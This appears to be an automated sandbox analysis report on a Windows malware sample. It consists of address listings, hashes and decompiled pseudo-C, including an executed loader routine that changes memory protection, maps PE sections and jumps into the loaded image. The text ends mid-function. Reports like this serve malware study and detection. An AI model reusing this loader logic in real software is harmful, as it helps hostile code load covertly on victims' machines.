                                                                                                                                                0x10011f89
                                                                                                                                                0x10012071
                                                                                                                                                0x00000000
                                                                                                                                                0x10012071
                                                                                                                                                0x10011f8f
                                                                                                                                                0x10011f8f
                                                                                                                                                0x10011f95
                                                                                                                                                0x10011f9b
                                                                                                                                                0x10011fb4
                                                                                                                                                0x10011fba
                                                                                                                                                0x10011fbc
                                                                                                                                                0x10012085
                                                                                                                                                0x10012091
                                                                                                                                                0x10012094
                                                                                                                                                0x10012096
                                                                                                                                                0x100120c7
                                                                                                                                                0x100120c7
                                                                                                                                                0x100120c9
                                                                                                                                                0x100120d5
                                                                                                                                                0x100120e0
                                                                                                                                                0x100120e5
                                                                                                                                                0x10011fd6
                                                                                                                                                0x10011fd6
                                                                                                                                                0x10011fd8
                                                                                                                                                0x10011fd8
                                                                                                                                                0x10011fda
                                                                                                                                                0x10011fda
                                                                                                                                                0x10011fdf
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011fe1
                                                                                                                                                0x10011fe2
                                                                                                                                                0x10011fe5
                                                                                                                                                0x10011fe8
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011fef
                                                                                                                                                0x10011ff4
                                                                                                                                                0x10011ff9
                                                                                                                                                0x10011ffd
                                                                                                                                                0x10012038
                                                                                                                                                0x1001203f
                                                                                                                                                0x10012047
                                                                                                                                                0x1001204a
                                                                                                                                                0x1001204f
                                                                                                                                                0x10012052
                                                                                                                                                0x10012055
                                                                                                                                                0x00000000
                                                                                                                                                0x10012055
                                                                                                                                                0x10011fff
                                                                                                                                                0x10012003
                                                                                                                                                0x10012004
                                                                                                                                                0x10012008
                                                                                                                                                0x1001200f
                                                                                                                                                0x1001201d
                                                                                                                                                0x10012020
                                                                                                                                                0x10012023
                                                                                                                                                0x10012026
                                                                                                                                                0x10012026
                                                                                                                                                0x10012026
                                                                                                                                                0x1001202c
                                                                                                                                                0x00000000
                                                                                                                                                0x1001202c
                                                                                                                                                0x1001205d
                                                                                                                                                0x1001205d
                                                                                                                                                0x10012066
                                                                                                                                                0x10012069
                                                                                                                                                0x1001206e
                                                                                                                                                0x00000000
                                                                                                                                                0x1001206e
                                                                                                                                                0x10012098
                                                                                                                                                0x1001209c
                                                                                                                                                0x1001209d
                                                                                                                                                0x100120a1
                                                                                                                                                0x100120a5
                                                                                                                                                0x100120af
                                                                                                                                                0x100120b2
                                                                                                                                                0x100120b5
                                                                                                                                                0x100120b8
                                                                                                                                                0x100120b8
                                                                                                                                                0x100120b8
                                                                                                                                                0x100120bb
                                                                                                                                                0x00000000
                                                                                                                                                0x100120bb
                                                                                                                                                0x10011fc2
                                                                                                                                                0x10011fd2
                                                                                                                                                0x10011fd2
                                                                                                                                                0x10011fd4
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011fca
                                                                                                                                                0x10011fcc
                                                                                                                                                0x10011fcc
                                                                                                                                                0x00000000
                                                                                                                                                0x10011fd2
                                                                                                                                                0x10011f9d
                                                                                                                                                0x10011fa3
                                                                                                                                                0x10011fa9
                                                                                                                                                0x10011fa9
                                                                                                                                                0x00000000
                                                                                                                                                0x10011fa3
                                                                                                                                                0x10011f77
                                                                                                                                                0x10011f7b
                                                                                                                                                0x10011f0d
                                                                                                                                                0x00000000
                                                                                                                                                0x10011f0d
                                                                                                                                                0x10011f7d
                                                                                                                                                0x10011f7d
                                                                                                                                                0x00000000
                                                                                                                                                0x10011f7d
                                                                                                                                                0x10011f32
                                                                                                                                                0x10011f32
                                                                                                                                                0x10011f34
                                                                                                                                                0x10011f34
                                                                                                                                                0x10011f38
                                                                                                                                                0x10011f3b
                                                                                                                                                0x10011f3e
                                                                                                                                                0x10011f41
                                                                                                                                                0x10011f47
                                                                                                                                                0x10011f4a
                                                                                                                                                0x10011f51
                                                                                                                                                0x10011f54
                                                                                                                                                0x10011f56
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011f58
                                                                                                                                                0x10011f59
                                                                                                                                                0x10011f5e
                                                                                                                                                0x10011f60
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011f60
                                                                                                                                                0x00000000
                                                                                                                                                0x10011f34
                                                                                                                                                0x10011f10
                                                                                                                                                0x10011ddd
                                                                                                                                                0x10011ddf
                                                                                                                                                0x10011de5
                                                                                                                                                0x10011df6
                                                                                                                                                0x10011df8
                                                                                                                                                0x10011dfa
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011e0d
                                                                                                                                                0x10011e0f
                                                                                                                                                0x10011e11
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011e17
                                                                                                                                                0x10011e17
                                                                                                                                                0x10011e1e
                                                                                                                                                0x10011e20
                                                                                                                                                0x10011e23
                                                                                                                                                0x10011e25
                                                                                                                                                0x10011de3
                                                                                                                                                0x10011de3
                                                                                                                                                0x10011de3
                                                                                                                                                0x00000000
                                                                                                                                                0x10011de3
                                                                                                                                                0x10011e2a
                                                                                                                                                0x10011e2c
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011e2e
                                                                                                                                                0x10011e30
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011e3f
                                                                                                                                                0x10011e4f
                                                                                                                                                0x10011e62
                                                                                                                                                0x10011e64
                                                                                                                                                0x10011e66
                                                                                                                                                0x10011e91
                                                                                                                                                0x10011e9a
                                                                                                                                                0x10011eaa
                                                                                                                                                0x10011eac
                                                                                                                                                0x10011eb5
                                                                                                                                                0x10011ebc
                                                                                                                                                0x10011ecc
                                                                                                                                                0x10011ed3
                                                                                                                                                0x10011ed3
                                                                                                                                                0x10011ee2
                                                                                                                                                0x10011eeb
                                                                                                                                                0x10011ef0
                                                                                                                                                0x10011ef4
                                                                                                                                                0x00000000
                                                                                                                                                0x10011ef4
                                                                                                                                                0x10011e73
                                                                                                                                                0x10011e7a
                                                                                                                                                0x10011e8b
                                                                                                                                                0x10011e8d
                                                                                                                                                0x10011e8f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10011e8f
                                                                                                                                                0x10011de5
                                                                                                                                                0x00000000
                                                                                                                                                0x10011d82
                                                                                                                                                0x10011d82
                                                                                                                                                0x10011d8c
                                                                                                                                                0x1001207d
                                                                                                                                                0x1001207d
                                                                                                                                                0x00000000
                                                                                                                                                0x10011d8c

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.319669645.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.319665498.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319682425.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319687174.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319691145.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 5d1683bff0e1a29d0212b6883f1335e9ab6e3bc7cd7ca7886de007c2d64f20f4
                                                                                                                                                • Instruction ID: 5609b69e05a1b06f5233c8e7297c4b8c04bd3945fb3a39e2e71c43012004eafc
                                                                                                                                                • Opcode Fuzzy Hash: 5d1683bff0e1a29d0212b6883f1335e9ab6e3bc7cd7ca7886de007c2d64f20f4
                                                                                                                                                • Instruction Fuzzy Hash: 53A1E7746043459BE714EF15C880BAEB3E6FF94340F21CA2DE9948F296D771E982CB91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E10006D50() {
                                                                                                                                                
                                                                                                                                                				 *0x1001d280 = GetUserNameW;
                                                                                                                                                				 *0x1001D284 = MessageBoxW;
                                                                                                                                                				 *0x1001D288 = GetLastError;
                                                                                                                                                				 *0x1001D28C = CreateFileA;
                                                                                                                                                				 *0x1001D290 = DebugBreak;
                                                                                                                                                				 *0x1001D294 = FlushFileBuffers;
                                                                                                                                                				 *0x1001D298 = FreeEnvironmentStringsA;
                                                                                                                                                				 *0x1001D29C = GetConsoleOutputCP;
                                                                                                                                                				 *0x1001D2A0 = GetEnvironmentStrings;
                                                                                                                                                				 *0x1001D2A4 = GetLocaleInfoA;
                                                                                                                                                				 *0x1001D2A8 = GetStartupInfoA;
                                                                                                                                                				 *0x1001D2AC = GetStringTypeA;
                                                                                                                                                				 *0x1001D2B0 = HeapValidate;
                                                                                                                                                				 *0x1001D2B4 = IsBadReadPtr;
                                                                                                                                                				 *0x1001D2B8 = LCMapStringA;
                                                                                                                                                				 *0x1001D2BC = LoadLibraryA;
                                                                                                                                                				 *0x1001D2C0 = OutputDebugStringA;
                                                                                                                                                				return 0x1001d280;
                                                                                                                                                			}



                                                                                                                                                0x10006d61
                                                                                                                                                0x10006d69
                                                                                                                                                0x10006d6c
                                                                                                                                                0x10006d7b
                                                                                                                                                0x10006d7e
                                                                                                                                                0x10006d8d
                                                                                                                                                0x10006d90
                                                                                                                                                0x10006d9f
                                                                                                                                                0x10006da2
                                                                                                                                                0x10006db1
                                                                                                                                                0x10006db4
                                                                                                                                                0x10006dc3
                                                                                                                                                0x10006dc6
                                                                                                                                                0x10006dd5
                                                                                                                                                0x10006dd8
                                                                                                                                                0x10006de7
                                                                                                                                                0x10006dea
                                                                                                                                                0x10006ded

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.319669645.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.319665498.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319682425.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319687174.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319691145.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 80f6e1a276fef8b33378afc9592b3d211071bdeb012eb600a46219d4b0432dd1
                                                                                                                                                • Instruction ID: 9a9f90be372116ce35b3bf57ca6adafecb814b37ff7dc50591bd4b03753dcc6b
                                                                                                                                                • Opcode Fuzzy Hash: 80f6e1a276fef8b33378afc9592b3d211071bdeb012eb600a46219d4b0432dd1
                                                                                                                                                • Instruction Fuzzy Hash: 99110FB8A05620CFD34ACF09D5D49117BF2BB8E360312C19AD8098B376D734D985CF54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                			E1000C218(void* __ecx, void* __edx) {
                                                                                                                                                				char _v28;
                                                                                                                                                				char _v33;
                                                                                                                                                				char _v38;
                                                                                                                                                				char _v43;
                                                                                                                                                				void* _t24;
                                                                                                                                                				char* _t25;
                                                                                                                                                				char _t32;
                                                                                                                                                				void* _t33;
                                                                                                                                                				void* _t34;
                                                                                                                                                				signed int _t38;
                                                                                                                                                				char* _t40;
                                                                                                                                                
                                                                                                                                                				_t40 = (_t38 & 0xfffffff0) - 0x2c;
                                                                                                                                                				asm("movq xmm0, [edx]");
                                                                                                                                                				_t32 = 0;
                                                                                                                                                				 *_t40 = 0x7b;
                                                                                                                                                				asm("movq [esp+0x1], xmm0");
                                                                                                                                                				_v43 = 0x2d;
                                                                                                                                                				do {
                                                                                                                                                					 *((char*)(_t40 + _t32 + 0xa)) =  *((intOrPtr*)(_t32 + __edx + 8));
                                                                                                                                                					_t32 = _t32 + 1;
                                                                                                                                                				} while (_t32 < 4);
                                                                                                                                                				_v38 = 0x2d;
                                                                                                                                                				_t33 = 0;
                                                                                                                                                				do {
                                                                                                                                                					 *((char*)(_t40 + _t33 + 0xf)) =  *((intOrPtr*)(_t33 + __edx + 0xc));
                                                                                                                                                					_t33 = _t33 + 1;
                                                                                                                                                				} while (_t33 < 4);
                                                                                                                                                				_v33 = 0x2d;
                                                                                                                                                				_t34 = 0;
                                                                                                                                                				do {
                                                                                                                                                					 *((char*)(_t40 + _t34 + 0x14)) =  *((intOrPtr*)(_t34 + __edx + 0x10));
                                                                                                                                                					_t34 = _t34 + 1;
                                                                                                                                                				} while (_t34 < 4);
                                                                                                                                                				_v28 = 0x2d;
                                                                                                                                                				_t24 = 0;
                                                                                                                                                				do {
                                                                                                                                                					asm("movd xmm0, dword [eax+edx+0x14]");
                                                                                                                                                					asm("movd [esp+eax+0x19], xmm0");
                                                                                                                                                					_t24 = _t24 + 4;
                                                                                                                                                				} while (_t24 < 0xc);
                                                                                                                                                				_t25 = _t40;
                                                                                                                                                				 *((char*)(_t25 + 0x25)) = 0x7d;
                                                                                                                                                				 *((char*)(_t25 + 0x26)) = 0;
                                                                                                                                                				E1000DFBC(__ecx, _t25, 0);
                                                                                                                                                				return __ecx;
                                                                                                                                                			}














                                                                                                                                                0x1000c21f
                                                                                                                                                0x1000c224
                                                                                                                                                0x1000c228
                                                                                                                                                0x1000c22a
                                                                                                                                                0x1000c22e
                                                                                                                                                0x1000c234
                                                                                                                                                0x1000c239
                                                                                                                                                0x1000c23d
                                                                                                                                                0x1000c241
                                                                                                                                                0x1000c242
                                                                                                                                                0x1000c249
                                                                                                                                                0x1000c24e
                                                                                                                                                0x1000c250
                                                                                                                                                0x1000c254
                                                                                                                                                0x1000c258
                                                                                                                                                0x1000c259
                                                                                                                                                0x1000c260
                                                                                                                                                0x1000c265
                                                                                                                                                0x1000c267
                                                                                                                                                0x1000c26b
                                                                                                                                                0x1000c26f
                                                                                                                                                0x1000c270
                                                                                                                                                0x1000c275
                                                                                                                                                0x1000c27a
                                                                                                                                                0x1000c27c
                                                                                                                                                0x1000c27c
                                                                                                                                                0x1000c282
                                                                                                                                                0x1000c288
                                                                                                                                                0x1000c28b
                                                                                                                                                0x1000c292
                                                                                                                                                0x1000c295
                                                                                                                                                0x1000c29b
                                                                                                                                                0x1000c2a0
                                                                                                                                                0x1000c2ae

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.319669645.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.319665498.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319682425.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319687174.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319691145.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: -$-$-$-
                                                                                                                                                • API String ID: 0-1033403326
                                                                                                                                                • Opcode ID: 1d36367edc1a87d387ea343f4f2a29612f5303ddecac01934eed59726700fcc9
                                                                                                                                                • Instruction ID: 6420cdf91b2b9fc5655fa5f82b4c53aa5eb92ddd4154ae73ebf41adf494228f8
                                                                                                                                                • Opcode Fuzzy Hash: 1d36367edc1a87d387ea343f4f2a29612f5303ddecac01934eed59726700fcc9
                                                                                                                                                • Instruction Fuzzy Hash: C811252091C3C04CE749DB7C548462BFFD08F9A208F1886BEE4DA86B53E525D49683B7
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Executed Functions

                                                                                                                                                C-Code - Quality: 42%
                                                                                                                                                			E008D193D(void* __ebx, long __edi, long __esi, intOrPtr* _a4) {
                                                                                                                                                				char _v20;
                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                				char _v44;
                                                                                                                                                				intOrPtr* _v48;
                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                				void* _v68;
                                                                                                                                                				char* _v72;
                                                                                                                                                				int _v76;
                                                                                                                                                				long _v80;
                                                                                                                                                				long _v84;
                                                                                                                                                				DWORD* _v88;
                                                                                                                                                				intOrPtr _v92;
                                                                                                                                                				int _v96;
                                                                                                                                                				intOrPtr* _v100;
                                                                                                                                                				intOrPtr _v104;
                                                                                                                                                				intOrPtr _v108;
                                                                                                                                                				intOrPtr _v112;
                                                                                                                                                				intOrPtr _v116;
                                                                                                                                                				intOrPtr _v120;
                                                                                                                                                				intOrPtr _v124;
                                                                                                                                                				void* _v128;
                                                                                                                                                				intOrPtr _v132;
                                                                                                                                                				char* _v136;
                                                                                                                                                				intOrPtr _v140;
                                                                                                                                                				intOrPtr _v144;
                                                                                                                                                				intOrPtr _v148;
                                                                                                                                                				intOrPtr _v152;
                                                                                                                                                				intOrPtr _v156;
                                                                                                                                                				int _v160;
                                                                                                                                                				intOrPtr _v164;
                                                                                                                                                				char* _v168;
                                                                                                                                                				intOrPtr _v172;
                                                                                                                                                				intOrPtr _v176;
                                                                                                                                                				char _v180;
                                                                                                                                                				intOrPtr* _t135;
                                                                                                                                                				int _t142;
                                                                                                                                                				int _t150;
                                                                                                                                                				int _t154;
                                                                                                                                                				intOrPtr _t169;
                                                                                                                                                				int _t175;
                                                                                                                                                				intOrPtr _t217;
                                                                                                                                                				void* _t224;
                                                                                                                                                				intOrPtr _t227;
                                                                                                                                                				void* _t234;
                                                                                                                                                				intOrPtr _t238;
                                                                                                                                                				intOrPtr _t245;
                                                                                                                                                				intOrPtr _t249;
                                                                                                                                                				DWORD* _t263;
                                                                                                                                                				void* _t267;
                                                                                                                                                				intOrPtr* _t270;
                                                                                                                                                				intOrPtr* _t271;
                                                                                                                                                
                                                                                                                                                				_t135 = _a4;
                                                                                                                                                				_v20 = 0;
                                                                                                                                                				_t234 =  *((intOrPtr*)(_t135 + 0x28));
                                                                                                                                                				 *0x8d4418 = 1;
                                                                                                                                                				asm("movaps xmm0, [0x8d3010]");
                                                                                                                                                				asm("movups [0x8d4428], xmm0");
                                                                                                                                                				_v48 = _t135;
                                                                                                                                                				_v52 =  *((intOrPtr*)(_t135 + 0x44));
                                                                                                                                                				_v56 =  *((intOrPtr*)(_v48 + 0xc));
                                                                                                                                                				_v180 = _t234;
                                                                                                                                                				_v176 =  *((intOrPtr*)(_v48 + 0x48));
                                                                                                                                                				_v172 = 4;
                                                                                                                                                				_v168 =  &_v20;
                                                                                                                                                				_v60 =  *((intOrPtr*)(_t135 + 0x30));
                                                                                                                                                				_v64 = 4;
                                                                                                                                                				_v68 = _t234;
                                                                                                                                                				_v72 =  &_v20;
                                                                                                                                                				_t142 = VirtualProtect(__ebx, __esi, __edi, _t263); // executed
                                                                                                                                                				_v76 = _t142;
                                                                                                                                                				_v180 = _v68;
                                                                                                                                                				_v176 = 0;
                                                                                                                                                				_v172 =  *((intOrPtr*)(_v48 + 0x48));
                                                                                                                                                				_v80 = 0x400;
                                                                                                                                                				_v84 = 2;
                                                                                                                                                				_v88 =  &_v20;
                                                                                                                                                				_v92 = 0;
                                                                                                                                                				E008D173B();
                                                                                                                                                				E008D21C2(_v68,  *_v48, _v60);
                                                                                                                                                				E008D173B( *_v48, 0, _v60);
                                                                                                                                                				_t150 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
                                                                                                                                                				_t270 = _t267 - 0x84;
                                                                                                                                                				_t224 = _v68;
                                                                                                                                                				_t249 =  *((intOrPtr*)(_t224 + 0x3c));
                                                                                                                                                				_v96 = _t150;
                                                                                                                                                				_v100 = _v68 + 0x3c;
                                                                                                                                                				_v104 = _t224;
                                                                                                                                                				_v108 = _t249;
                                                                                                                                                				if(_t249 != 0) {
                                                                                                                                                					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                                				}
                                                                                                                                                				_v112 = _v104;
                                                                                                                                                				if(_v56 != 0) {
                                                                                                                                                					_v116 = 0;
                                                                                                                                                					_v120 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
                                                                                                                                                					while(1) {
                                                                                                                                                						_t169 = _v120;
                                                                                                                                                						_v152 = _t169;
                                                                                                                                                						_t245 = _v152;
                                                                                                                                                						_v180 = _v68 +  *((intOrPtr*)(_t245 + 0xc));
                                                                                                                                                						_v176 =  *((intOrPtr*)(_t245 + 8));
                                                                                                                                                						_v172 =  *((intOrPtr*)(0x8d4418 + (( *(_t169 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t169 + 0x24) >> 0x1f << 3) + (( *(_t169 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
                                                                                                                                                						_v168 =  &_v20;
                                                                                                                                                						_v156 = _v116;
                                                                                                                                                						_t175 = VirtualProtect(??, ??, ??, ??); // executed
                                                                                                                                                						_t270 = _t270 - 0x10;
                                                                                                                                                						_t217 = _v156 + 1;
                                                                                                                                                						_v160 = _t175;
                                                                                                                                                						_v116 = _t217;
                                                                                                                                                						_v120 = _v152 + 0x28;
                                                                                                                                                						if(_t217 == _v56) {
                                                                                                                                                							goto L12;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				L12:
                                                                                                                                                				 *_t270 = _v68;
                                                                                                                                                				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x3c));
                                                                                                                                                				_t154 = DisableThreadLibraryCalls(??);
                                                                                                                                                				_t271 = _t270 - 4;
                                                                                                                                                				_t227 =  *_v100;
                                                                                                                                                				_v164 = _t154;
                                                                                                                                                				_v124 = _t227;
                                                                                                                                                				_v128 = _v68;
                                                                                                                                                				if(_t227 != 0) {
                                                                                                                                                					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                                                                				}
                                                                                                                                                				_t238 = _v48;
                                                                                                                                                				_v44 =  *((intOrPtr*)(_t238 + 0x40));
                                                                                                                                                				_v40 =  *((intOrPtr*)(_t238 + 0x24));
                                                                                                                                                				_v36 =  *((intOrPtr*)(_t238 + 0x38));
                                                                                                                                                				_v32 =  *((intOrPtr*)(_t238 + 0x50));
                                                                                                                                                				_v28 =  *((intOrPtr*)(_t238 + 0x18));
                                                                                                                                                				_v24 = _v132;
                                                                                                                                                				 *_t271 = _t238;
                                                                                                                                                				_v180 = 0;
                                                                                                                                                				_v176 = 0x5c;
                                                                                                                                                				_v136 =  &_v44;
                                                                                                                                                				_v140 = 0;
                                                                                                                                                				_v144 = 0x5c;
                                                                                                                                                				_v148 =  *((intOrPtr*)(_v128 + 0x28));
                                                                                                                                                				E008D173B();
                                                                                                                                                				if(_v148 != 0) {
                                                                                                                                                					_t270 =  *((intOrPtr*)( &_v44 + 0x10));
                                                                                                                                                					goto __eax;
                                                                                                                                                				}
                                                                                                                                                				return 1;
                                                                                                                                                			}





























































                                                                                                                                                0x008d1949
                                                                                                                                                0x008d1957
                                                                                                                                                0x008d195e
                                                                                                                                                0x008d1961
                                                                                                                                                0x008d196b
                                                                                                                                                0x008d1972
                                                                                                                                                0x008d197c
                                                                                                                                                0x008d1982
                                                                                                                                                0x008d198b
                                                                                                                                                0x008d1994
                                                                                                                                                0x008d1997
                                                                                                                                                0x008d199b
                                                                                                                                                0x008d19a3
                                                                                                                                                0x008d19aa
                                                                                                                                                0x008d19ad
                                                                                                                                                0x008d19b0
                                                                                                                                                0x008d19b3
                                                                                                                                                0x008d19b6
                                                                                                                                                0x008d19d0
                                                                                                                                                0x008d19d6
                                                                                                                                                0x008d19d9
                                                                                                                                                0x008d19e1
                                                                                                                                                0x008d19e5
                                                                                                                                                0x008d19e8
                                                                                                                                                0x008d19eb
                                                                                                                                                0x008d19ee
                                                                                                                                                0x008d19f1
                                                                                                                                                0x008d1a0c
                                                                                                                                                0x008d1a28
                                                                                                                                                0x008d1a4d
                                                                                                                                                0x008d1a4f
                                                                                                                                                0x008d1a58
                                                                                                                                                0x008d1a5b
                                                                                                                                                0x008d1a65
                                                                                                                                                0x008d1a68
                                                                                                                                                0x008d1a6b
                                                                                                                                                0x008d1a6e
                                                                                                                                                0x008d1a71
                                                                                                                                                0x008d1a8c
                                                                                                                                                0x008d1a8c
                                                                                                                                                0x008d1b76
                                                                                                                                                0x008d1b79
                                                                                                                                                0x008d1aa5
                                                                                                                                                0x008d1aa8
                                                                                                                                                0x008d1b84
                                                                                                                                                0x008d1b84
                                                                                                                                                0x008d1b9b
                                                                                                                                                0x008d1bc3
                                                                                                                                                0x008d1bcf
                                                                                                                                                0x008d1bd2
                                                                                                                                                0x008d1bd6
                                                                                                                                                0x008d1bda
                                                                                                                                                0x008d1be1
                                                                                                                                                0x008d1be7
                                                                                                                                                0x008d1be9
                                                                                                                                                0x008d1bf2
                                                                                                                                                0x008d1c03
                                                                                                                                                0x008d1c09
                                                                                                                                                0x008d1c0c
                                                                                                                                                0x008d1c0f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x008d1c11
                                                                                                                                                0x008d1b84
                                                                                                                                                0x008d1c31
                                                                                                                                                0x008d1c3f
                                                                                                                                                0x008d1c47
                                                                                                                                                0x008d1c4a
                                                                                                                                                0x008d1c4c
                                                                                                                                                0x008d1c52
                                                                                                                                                0x008d1c5e
                                                                                                                                                0x008d1c64
                                                                                                                                                0x008d1c67
                                                                                                                                                0x008d1c6a
                                                                                                                                                0x008d1ae4
                                                                                                                                                0x008d1ae4
                                                                                                                                                0x008d1af7
                                                                                                                                                0x008d1afd
                                                                                                                                                0x008d1b03
                                                                                                                                                0x008d1b09
                                                                                                                                                0x008d1b0f
                                                                                                                                                0x008d1b15
                                                                                                                                                0x008d1b1b
                                                                                                                                                0x008d1b1e
                                                                                                                                                0x008d1b21
                                                                                                                                                0x008d1b29
                                                                                                                                                0x008d1b31
                                                                                                                                                0x008d1b37
                                                                                                                                                0x008d1b3d
                                                                                                                                                0x008d1b43
                                                                                                                                                0x008d1b49
                                                                                                                                                0x008d1b57
                                                                                                                                                0x008d1c24
                                                                                                                                                0x008d1c2a
                                                                                                                                                0x008d1c2a
                                                                                                                                                0x008d1ac9

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.506105980.00000000008D0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID: \
                                                                                                                                                • API String ID: 544645111-2967466578
                                                                                                                                                • Opcode ID: c3d88f89774c3b90d212d0c23a774cbab37ed882caf94f42eacc1c13e8524f4e
                                                                                                                                                • Instruction ID: a2a3f9ccf779ea13181cce1216a167c87cc3c0bb93b0bbae29e3ee2f505e81b9
                                                                                                                                                • Opcode Fuzzy Hash: c3d88f89774c3b90d212d0c23a774cbab37ed882caf94f42eacc1c13e8524f4e
                                                                                                                                                • Instruction Fuzzy Hash: C7B1ADB4D052189FCB14CFA9C984A9DFBF1FF88310F15856AE959AB352D330A941CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.506105980.00000000008D0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                                                                • Instruction ID: 9ee8fa0b075f644a3755679f8acc50e4eb3da17090939388a1a366b7f4018595
                                                                                                                                                • Opcode Fuzzy Hash: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                                                                • Instruction Fuzzy Hash: E441D0B5E0421A9FDB44CFA8C4946AEBBF1FF48314F14852AE848AB340D375A881CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Non-executed Functions

                                                                                                                                                Executed Functions

                                                                                                                                                C-Code - Quality: 42%
                                                                                                                                                			E005E193D(void* __ebx, long __edi, long __esi, intOrPtr* _a4) {
                                                                                                                                                				char _v20;
                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                				char _v44;
                                                                                                                                                				intOrPtr* _v48;
                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                				void* _v68;
                                                                                                                                                				char* _v72;
                                                                                                                                                				int _v76;
                                                                                                                                                				long _v80;
                                                                                                                                                				long _v84;
                                                                                                                                                				DWORD* _v88;
                                                                                                                                                				intOrPtr _v92;
                                                                                                                                                				int _v96;
                                                                                                                                                				intOrPtr* _v100;
                                                                                                                                                				intOrPtr _v104;
                                                                                                                                                				intOrPtr _v108;
                                                                                                                                                				intOrPtr _v112;
                                                                                                                                                				intOrPtr _v116;
                                                                                                                                                				intOrPtr _v120;
                                                                                                                                                				intOrPtr _v124;
                                                                                                                                                				void* _v128;
